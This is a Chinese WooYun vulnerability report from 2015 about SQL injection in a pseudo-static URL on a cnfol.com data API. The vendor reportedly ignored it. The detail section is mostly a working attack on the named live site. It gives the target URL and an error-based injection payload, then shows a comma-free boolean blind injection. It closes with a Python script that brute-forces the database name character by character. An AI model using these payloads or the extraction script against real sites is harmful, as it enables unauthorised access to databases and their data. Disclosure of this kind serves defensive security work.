当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141577

漏洞标题:中金在线某站伪静态页面SQL注入

相关厂商:福建中金在线网络股份有限公司

漏洞作者: 渔村安全实验室

提交时间:2015-09-16 16:04

修复时间:2015-09-21 16:06

公开时间:2015-09-21 16:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-16: 细节已通知厂商并且等待厂商处理中
2015-09-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

http://app.cnfol.com/dataapi/index.php/welcome/hkthpj/205/6/1/id/asc/point_1+/point_2/


point_1与point_2可以从这两个参数下手

QQ截图20150916150141.png


既然有SQL的错误信息,尝试报错注入

http://app.cnfol.com/dataapi/index.php/welcome/hkthpj/205/6/1/id/asc/1 = 1+AND (SELECT 4482 FROM(SELECT COUNT(*),CONCAT(0x4f784e54,(SELECT (ELT(4482=4482,1))),0x7a794758,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)/point_2/


QQ截图20150916150400.png


从返回信息可以看到,过滤了逗号,会把逗号替换成and,换个思路,换成布尔类型注入

QQ截图20150916143810.png


QQ截图20150916143833.png


由此判断可以利用布尔类型注入,但要绕过他的检测,payload中不能使用逗号
先猜解出database的长度,长度为8

http://app.cnfol.com/dataapi/index.php/welcome/hkthpj/205/6/1/id/asc/ 1=(SELECT LENGTH(database()) =8)+


写个脚本猜解下

import requests
import os
user_len = 8
url = u'http://app.cnfol.com/dataapi/index.php/welcome/hkthpj/205/6/1/id/asc/(ascii(mid(%s from(%d)for(1)))<%d)+'
index = 1
temp = ''
print 'fetching database start:'
while index <= user_len:
    test_num = 200
    while test_num:
        oper = requests.get(url % (u'database()', index, test_num))
        if oper.status_code is 200:
            if len(oper.content) < 13972:
                temp += chr(test_num)
                print temp
                break
            test_num -= 1
    index += 1
print 'database:%s\n' % temp
os.system('pause')


QQ截图20150916153523.png


漏洞证明:

修复方案:

你比我懂

版权声明:转载请注明来源 渔村安全实验室@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-21 16:06

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无